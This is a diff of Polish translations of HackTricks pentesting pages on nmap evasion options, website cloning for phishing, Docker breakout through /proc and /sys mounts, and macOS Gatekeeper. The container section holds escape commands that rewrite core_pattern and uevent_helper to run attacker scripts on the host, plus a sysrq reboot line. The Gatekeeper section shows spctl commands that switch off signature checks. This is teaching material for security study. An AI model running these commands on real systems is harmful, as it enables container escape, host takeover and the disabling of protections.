Aby skonfigurować pakiet IP w pełni, użyj **--ip-options**
@ -182,7 +182,7 @@ Jeśli chcesz zobaczyć opcje w wysyłanych i otrzymywanych pakietach, określ -
**--randomize-hosts** Aby atak był mniej oczywisty
**--spoof-mac** _**\<adresMAC, prefiks lub nazwa producenta>**_ Do zmiany adresu MAC, przykłady: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
**--proxies** _**\<Lista adresów URL proxy oddzielonych przecinkami>**_ Aby używać proxy, czasami proxy nie utrzymuje tylu otwartych połączeń, ile chce nmap, dlatego należy dostosować równoległość: --max-parallelism
**--proxies** _**\<Lista oddzielonych przecinkami adresów proxy>**_ Aby korzystać z proxy, czasami proxy nie utrzymuje tylu otwartych połączeń, ile nmap chce, dlatego należy dostosować równoległość: --max-parallelism
**-sP** Do odkrywania hostów w sieci, w której się znajdujemy za pomocą ARP
@ -200,17 +200,17 @@ Wielu administratorów tworzy regułę w firewallu, która pozwala na przepuszcz
**-oA plik** Wszystkie oprócz -oS
**-v poziom** poziom szczegółowości
**-v poziom** szczegółowość
**-d poziom** debugowanie
**--reason** Powód hosta i jego stan
**--reason** Powód hosta i stan
**--stats-every czas** Co jakiś czas pokazuje postęp
**--packet-trace** Aby zobaczyć, jakie pakiety są wysyłane, można określić filtry, takie jak: --version-trace lub --script-trace
**--open** Pokazuje otwarte, otwarte|filtrowane i niezfiltrowane
**--open** pokazuje otwarte, otwarte|filtrowane i niezfiltrowane
**--resume plik** Tworzy podsumowanie
@ -255,9 +255,9 @@ Należy również pobrać pakiety z baz danych i dodać je do /usr/share/nmap/sc
Użycie:
Aby użyć wszystkich: sudo nmap -sV --script=vulscan HOST\_A\_DO\_Skanowania
Aby użyć wszystkich: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
Aby użyć określonej bazy danych: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_DO\_Skanowania
Aby użyć konkretnej bazy danych: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
## Przyspieszenie skanowania usług Nmap x16
@ -265,9 +265,9 @@ Zgodnie z [**tym postem**](https://joshua.hu/nmap-speedup-service-scanning-16x)
Ponadto sondy, które nie mają zdefiniowanej wartości **`servicewaitms`**, używają domyślnej wartości **`5000`**. Dlatego możemy albo dodać wartości do każdej z sond, albo **skompilować nmap** samodzielnie i zmienić domyślną wartość w [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
Jeśli nie chcesz w ogóle zmieniać wartości **`totalwaitms`** i **`tcpwrappedms`** w pliku `/usr/share/nmap/nmap-service-probes`, możesz edytować [kod parsowania](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) w taki sposób, aby te wartości w pliku `nmap-service-probes` były całkowicie ignorowane.
Jeśli nie chcesz w ogóle zmieniać wartości **`totalwaitms`** i **`tcpwrappedms`** w pliku `/usr/share/nmap/nmap-service-probes`, można zmodyfikować [kod parsowania](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) tak, aby te wartości w pliku `nmap-service-probes` były całkowicie ignorowane.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -280,7 +280,7 @@ Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub grupy [**telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

14
generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
View file

@ -4,15 +4,15 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -28,7 +28,7 @@ Istnieją różne narzędzia, których można użyć w tym celu:
```text
wget -mk -nH
```
## goclone
## sklonujgo
```bash
#https://github.com/imthaghost/goclone
goclone <url>
@ -37,7 +37,7 @@ goclone <url>
```bash
#https://github.com/trustedsec/social-engineer-toolkit
```
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -48,10 +48,10 @@ goclone <url>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
</details>

38
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i stań się mistrzem hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
@ -10,11 +10,11 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
</details>
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../..https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -22,7 +22,7 @@ Ujawnienie `/proc` i `/sys` bez odpowiedniej izolacji przestrzeni nazw wprowadza
**Możesz znaleźć dalsze szczegóły dotyczące każdej potencjalnej luki w** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
## Zagrożenia procfs
## Zagrożenia związane z procfs
### `/proc/sys`
@ -31,14 +31,14 @@ Ten katalog umożliwia dostęp do modyfikacji zmiennych jądra, zazwyczaj za pom
#### **`/proc/sys/kernel/core_pattern`**
* Opisany w [core(5)](https://man7.org/linux/man-pages/man5/core.5.html).
* Pozwala zdefiniować program do wykonania podczas generowania pliku rdzenia z pierwszymi 128 bajtami jako argumentami. Może to prowadzić do wykonania kodu, jeśli plik zaczyna się od rury `|`.
* Umożliwia zdefiniowanie programu do wykonania podczas generowania pliku rdzenia z pierwszymi 128 bajtami jako argumentami. Może to prowadzić do wykonania kodu, jeśli plik zaczyna się od rury `|`.
* **Przykład testowania i eksploatacji**:
```bash
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test dostępu do zapisu
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Ustawianie niestandardowego obsługiwacza
sleep 5 && ./crash & # Wywołanie obsługiwacza
echo "|$overlay/shell.sh" > core_pattern # Ustawianie niestandardowego obsługującego
sleep 5 && ./crash & # Wywołanie obsługującego
```
#### **`/proc/sys/kernel/modprobe`**
@ -54,7 +54,7 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Sprawdzanie dostępu do modprobe
#### **`/proc/sys/vm/panic_on_oom`**
* Wzmiankowany w [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
* Globalna flaga kontrolująca, czy jądro ma panikować czy wywoływać zabójcę OOM, gdy wystąpi warunek OOM.
* Globalna flaga kontrolująca, czy jądro wpada w panikę czy wywołuje zabójcę OOM, gdy wystąpi warunek OOM.
#### **`/proc/sys/fs`**
@ -63,7 +63,7 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Sprawdzanie dostępu do modprobe
#### **`/proc/sys/fs/binfmt_misc`**
* Umożliwia rejestrację interpreterów dla formatów binarnych nie-natywnych na podstawie ich numeru magicznego.
* Umożliwia rejestrację interpretatorów dla formatów binarnych nie-natywnych na podstawie ich numeru magicznego.
* Może prowadzić do eskalacji uprawnień lub uzyskania dostępu do powłoki root, jeśli `/proc/sys/fs/binfmt_misc/register` jest zapisywalny.
* Związany exploit i wyjaśnienie:
* [Rootkit dla ubogich poprzez binfmt\_misc](https://github.com/toffan/binfmt\_misc)
@ -88,7 +88,7 @@ echo b > /proc/sysrq-trigger # Ponowne uruchomienie hosta
#### **`/proc/kmsg`**
* Ujawnia komunikaty z bufora pierścieniowego jądra.
* Może pomóc w eksploatacji jądra, ujawnianiu adresów i dostarczaniu wrażliwych informacji systemowych.
* Może pomóc w eksploatacji jądra, wyciekach adresów i dostarczaniu wrażliwych informacji systemowych.
#### **`/proc/kallsyms`**
@ -113,12 +113,12 @@ echo b > /proc/sysrq-trigger # Ponowne uruchomienie hosta
#### **`/proc/kmem`**
* Alternatywny interfejs dla `/dev/kmem`, reprezentujący pamięć wirtualną jądra.
* Umożliwia odczytywanie i zapisywanie, co umożliwia bezpośrednią modyfikację pamięci jądra.
* Umożliwia odczyt i zapis, co umożliwia bezpośrednią modyfikację pamięci jądra.
#### **`/proc/mem`**
* Alternatywny interfejs dla `/dev/mem`, reprezentujący pamięć fizyczną.
* Umożliwia odczytywanie i zapisywanie, a modyfikacja całej pamięci wymaga przekształcenia adresów wirtualnych na fizyczne.
* Umożliwia odczyt i zapis, a modyfikacja całej pamięci wymaga przekształcenia adresów wirtualnych na fizyczne.
#### **`/proc/sched_debug`**
@ -130,7 +130,7 @@ echo b > /proc/sysrq-trigger # Ponowne uruchomienie hosta
* Udostępnia informacje o punktach montowania w przestrzeni nazw montowania procesu.
* Ujawnia lokalizację `rootfs` kontenera lub obrazu.
### Zagrożenia sysfs
### Zagrożenia związane z `/sys`
#### **`/sys/kernel/uevent_helper`**
@ -142,7 +142,7 @@ echo b > /proc/sysrq-trigger # Ponowne uruchomienie hosta
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
### Znajduje ścieżkę hosta z montowania OverlayFS dla kontenera
### Znajduje ścieżkę hosta z montażu OverlayFS dla kontenera
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
@ -163,7 +163,7 @@ cat /output %%%
#### **`/sys/kernel/vmcoreinfo`**
* Wycieka adresy jądra, potencjalnie kompromitując KASLR.
* Ujawnia adresy jądra, potencjalnie kompromitując KASLR.
#### **`/sys/kernel/security`**
@ -172,8 +172,8 @@ cat /output %%%
#### **`/sys/firmware/efi/vars` and `/sys/firmware/efi/efivars`**
* Ujawnia interfejsy do interakcji z zmiennymi EFI w pamięci NVRAM.
* Niewłaściwa konfiguracja lub eksploatacja może prowadzić do zablokowania laptopów lub niemożliwości uruchomienia hosta.
* Ujawnia interfejsy do interakcji z zmiennymi EFI w NVRAM.
* Niewłaściwa konfiguracja lub eksploatacja może prowadzić do zablokowania laptopów lub niemożliwości uruchomienia hostów.
#### **`/sys/kernel/debug`**
@ -186,7 +186,7 @@ cat /output %%%
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../..https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -199,7 +199,7 @@ Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

106
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View file

@ -2,42 +2,42 @@
<details>
<summary><strong>Zacznij od zera i stań się ekspertem od hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij naukę hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud)
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud)
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Gatekeeper
**Gatekeeper** to funkcja bezpieczeństwa opracowana dla systemów operacyjnych Mac, zaprojektowana w celu zapewnienia, że użytkownicy **uruchamiają tylko zaufane oprogramowanie** na swoich systemach. Działa poprzez **weryfikację oprogramowania**, które użytkownik pobiera i próbuje otworzyć z **źródeł spoza App Store**, takich jak aplikacja, wtyczka lub pakiet instalacyjny.
**Gatekeeper** to funkcja zabezpieczeń opracowana dla systemów operacyjnych Mac, zaprojektowana w celu zapewnienia, że użytkownicy **uruchamiają tylko zaufane oprogramowanie** na swoich systemach. Działa poprzez **weryfikację oprogramowania**, które użytkownik pobiera i próbuje otworzyć z **źródeł spoza App Store**, takich jak aplikacja, wtyczka lub pakiet instalacyjny.
Kluczowym mechanizmem Gatekeepera jest jego **proces weryfikacji**. Sprawdza, czy pobrane oprogramowanie jest **podpisane przez uznawanego dewelopera**, zapewniając autentyczność oprogramowania. Ponadto sprawdza, czy oprogramowanie jest **zatwierdzone przez Apple**, potwierdzając, że jest wolne od znanych treści złośliwych i nie zostało naruszone po zatwierdzeniu.
Kluczowym mechanizmem Gatekeepera jest jego **proces weryfikacji**. Sprawdza, czy pobrane oprogramowanie jest **podpisane przez uznawanego dewelopera**, zapewniając autentyczność oprogramowania. Ponadto sprawdza, czy oprogramowanie jest **zatwierdzone przez Apple**, potwierdzając, że jest wolne od znanych treści złośliwych i nie zostało zmodyfikowane po zatwierdzeniu.
Dodatkowo, Gatekeeper wzmacnia kontrolę i bezpieczeństwo użytkownika, **prosząc użytkowników o zatwierdzenie otwarcia** pobranego oprogramowania po raz pierwszy. Ta ochrona pomaga zapobiec przypadkowemu uruchomieniu potencjalnie szkodliwego kodu wykonywalnego, który użytkownik mógł pomylić z nieszkodliwym plikiem danych.
Dodatkowo, Gatekeeper wzmacnia kontrolę użytkownika i bezpieczeństwo, **prosząc użytkowników o zatwierdzenie otwarcia** pobranego oprogramowania po raz pierwszy. Ta ochrona pomaga zapobiec przypadkowemu uruchomieniu potencjalnie szkodliwego kodu wykonywalnego, który użytkownik mógł pomylić z nieszkodliwym plikiem danych.
### Podpisy Aplikacji
Podpisy aplikacji, znane również jako podpisy kodu, są kluczowym elementem infrastruktury bezpieczeństwa Apple. Służą do **weryfikacji tożsamości autora oprogramowania** (dewelopera) oraz zapewnienia, że kod nie został naruszony od czasu ostatniego podpisania.
Podpisy aplikacji, znane również jako podpisy kodu, są kluczowym elementem infrastruktury bezpieczeństwa Apple. Służą do **weryfikacji tożsamości autora oprogramowania** (dewelopera) oraz zapewnienia, że kod nie został zmieniony od czasu ostatniego podpisania.
Oto jak to działa:
1. **Podpisywanie Aplikacji:** Gdy deweloper jest gotowy do dystrybucji swojej aplikacji, **podpisuje ją za pomocą klucza prywatnego**. Ten klucz prywatny jest powiązany z **certyfikatem, który Apple wydaje deweloperowi** podczas zapisywania się do programu Apple Developer Program. Proces podpisywania polega na utworzeniu kryptograficznego skrótu wszystkich części aplikacji i zaszyfrowaniu tego skrótu kluczem prywatnym dewelopera.
1. **Podpisywanie Aplikacji:** Gdy deweloper jest gotowy do dystrybucji swojej aplikacji, **podpisuje aplikację przy użyciu klucza prywatnego**. Ten klucz prywatny jest powiązany z **certyfikatem, który Apple wydaje deweloperowi** podczas zapisywania się do programu dla deweloperów Apple. Proces podpisywania polega na utworzeniu kryptograficznego skrótu wszystkich części aplikacji i zaszyfrowaniu tego skrótu kluczem prywatnym dewelopera.
2. **Dystrybucja Aplikacji:** Podpisana aplikacja jest następnie dystrybuowana do użytkowników wraz z certyfikatem dewelopera, który zawiera odpowiadający klucz publiczny.
3. **Weryfikacja Aplikacji:** Gdy użytkownik pobiera i próbuje uruchomić aplikację, ich system operacyjny Mac używa klucza publicznego z certyfikatu dewelopera do odszyfrowania skrótu. Następnie ponownie oblicza skrót na podstawie bieżącego stanu aplikacji i porównuje go z odszyfrowanym skrótem. Jeśli się zgadzają, oznacza to, że **aplikacja nie została zmodyfikowana** od czasu podpisania przez dewelopera, i system zezwala na uruchomienie aplikacji.
Podpisy aplikacji są istotną częścią technologii Gatekeeper firmy Apple. Gdy użytkownik próbuje **otworzyć aplikację pobraną z internetu**, Gatekeeper weryfikuje podpis aplikacji. Jeśli jest on podpisany certyfikatem wydanym przez znanego dewelopera Apple i kod nie został naruszony, Gatekeeper zezwala na uruchomienie aplikacji. W przeciwnym razie blokuje aplikację i informuje użytkownika.
Podpisy aplikacji są istotną częścią technologii Gatekeeper firmy Apple. Gdy użytkownik próbuje **otworzyć aplikację pobraną z internetu**, Gatekeeper weryfikuje podpis aplikacji. Jeśli jest on podpisany certyfikatem wydanym przez znanego dewelopera Apple i kod nie został zmieniony, Gatekeeper zezwala na uruchomienie aplikacji. W przeciwnym razie blokuje aplikację i informuje użytkownika.
Począwszy od macOS Catalina, **Gatekeeper sprawdza również, czy aplikacja została zatwierdzona** przez Apple, dodając dodatkową warstwę bezpieczeństwa. Proces zatwierdzania sprawdza aplikację pod kątem znanych problemów z bezpieczeństwem i kodu złośliwego, a jeśli te kontrole zostaną zaliczone, Apple dodaje bilet do aplikacji, który Gatekeeper może zweryfikować.
Począwszy od macOS Catalina, **Gatekeeper sprawdza również, czy aplikacja została zatwierdzona** przez Apple, dodając dodatkową warstwę zabezpieczeń. Proces notaryzacji sprawdza aplikację pod kątem znanych problemów z bezpieczeństwem i kodu złośliwego, a jeśli te testy zostaną zaliczone, Apple dodaje bilet do aplikacji, który Gatekeeper może zweryfikować.
#### Sprawdzanie Podpisów
@ -62,9 +62,9 @@ codesign -s <cert-name-keychain> toolsdemo
Proces notaryzacji firmy Apple stanowi dodatkowe zabezpieczenie mające na celu ochronę użytkowników przed potencjalnie szkodliwym oprogramowaniem. Polega on na **dostarczeniu przez dewelopera swojej aplikacji do zbadania** przez **Usługę Notarialną Apple**, która nie powinna być mylona z Recenzją Aplikacji. Ta usługa to **zautomatyzowany system**, który analizuje przesłane oprogramowanie pod kątem **zawartości szkodliwej** oraz ewentualnych problemów z podpisem kodu.
Jeśli oprogramowanie **przejdzie** tę inspekcję bez podniesienia jakichkolwiek obaw, Usługa Notarialna generuje bilet notaryzacyjny. Następnie deweloper jest zobowiązany do **dołączenia tego biletu do swojego oprogramowania**, proces ten nazywa się 'przypinaniem'. Ponadto bilet notaryzacyjny jest również publikowany online, gdzie Gatekeeper, technologia bezpieczeństwa Apple, może uzyskać do niego dostęp.
Jeśli oprogramowanie **przejdzie** tę inspekcję bez podniesienia jakichkolwiek wątpliwości, Usługa Notarialna generuje bilet notaryzacyjny. Następnie deweloper musi **dołączyć ten bilet do swojego oprogramowania**, co jest procesem znanym jako 'zszywanie'. Ponadto bilet notaryzacyjny jest również publikowany online, gdzie Gatekeeper, technologia bezpieczeństwa Apple, może uzyskać do niego dostęp.
Podczas pierwszej instalacji lub uruchomienia oprogramowania przez użytkownika, istnienie biletu notaryzacyjnego - czy to przypiętego do pliku wykonywalnego, czy znalezionego online - **informuje Gatekeepera, że oprogramowanie zostało notaryzowane przez Apple**. W rezultacie Gatekeeper wyświetla opisową wiadomość w oknie początkowego uruchomienia, informującą, że oprogramowanie zostało poddane sprawdzeniom pod kątem zawartości szkodliwej przez Apple. Ten proces zwiększa zaufanie użytkowników do bezpieczeństwa oprogramowania, które instalują lub uruchamiają na swoich systemach.
Podczas pierwszej instalacji lub uruchomienia oprogramowania przez użytkownika, istnienie biletu notaryzacyjnego - czy to zszytego z plikiem wykonywalnym, czy znalezionego online - **informuje Gatekeepera, że oprogramowanie zostało notaryzowane przez Apple**. W rezultacie Gatekeeper wyświetla opisową wiadomość w początkowym oknie uruchamiania, informującą, że oprogramowanie zostało poddane sprawdzeniom pod kątem zawartości szkodliwej przez Apple. Ten proces zwiększa zaufanie użytkowników do bezpieczeństwa oprogramowania, które instalują lub uruchamiają na swoich systemach.
### Wyliczanie GateKeeper
@ -76,7 +76,7 @@ Można sprawdzić **status** GateKeepera za pomocą:
spctl --status
```
{% hint style="danger" %}
Należy pamiętać, że sprawdzanie sygnatury GateKeeper jest wykonywane tylko dla **plików z atrybutem kwarantanny**, a nie dla każdego pliku.
Należy zauważyć, że sprawdzanie sygnatury GateKeeper jest wykonywane tylko dla **plików z atrybutem kwarantanny**, a nie dla każdego pliku.
{% endhint %}
GateKeeper sprawdzi, czy zgodnie z **preferencjami i sygnaturą** można uruchomić plik binarny:
@ -99,7 +99,7 @@ anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists an
```
Zauważ, jak pierwsza reguła zakończyła się na "**App Store**", a druga na "**Developer ID**", a w poprzednim obrazie było **włączone wykonywanie aplikacji ze sklepu App Store i zidentyfikowanych deweloperów**. Jeśli **zmienisz** to ustawienie na App Store, reguły "**Notarized Developer ID**" znikną.
Istnieje również tysiące reguł typu **GKE**:
Istnieje także tysiące reguł **typu GKE**:
```bash
SELECT requirement,allow,disabled,label from authority where label = 'GKE' limit 5;
cdhash H"b40281d347dc574ae0850682f0fd1173aa2d0a39"|1|0|GKE
@ -114,7 +114,7 @@ Lub możesz wyświetlić poprzednie informacje za pomocą:
```bash
sudo spctl --list
```
Opcje **`--master-disable`** i **`--global-disable`** polecenia **`spctl`** całkowicie **wyłączą** te kontrole podpisów:
Opcje **`--master-disable`** i **`--global-disable`** polecenia **`spctl`** całkowicie wyłączą te kontrole podpisów:
```bash
# Disable GateKeeper
spctl --global-disable
@ -124,7 +124,7 @@ spctl --master-disable
spctl --global-enable
spctl --master-enable
```
Kiedy jest całkowicie włączony, pojawi się nowa opcja:
Gdy jest w pełni włączony, pojawi się nowa opcja:
<figure><img src="../../../.gitbook/assets/image (1148).png" alt=""><figcaption></figcaption></figure>
@ -147,24 +147,24 @@ sudo spctl --enable --label "whitelist"
spctl --assess -v /Applications/App.app
/Applications/App.app: accepted
```
### Pliki kwarantanny
### Pliki w kwarantannie
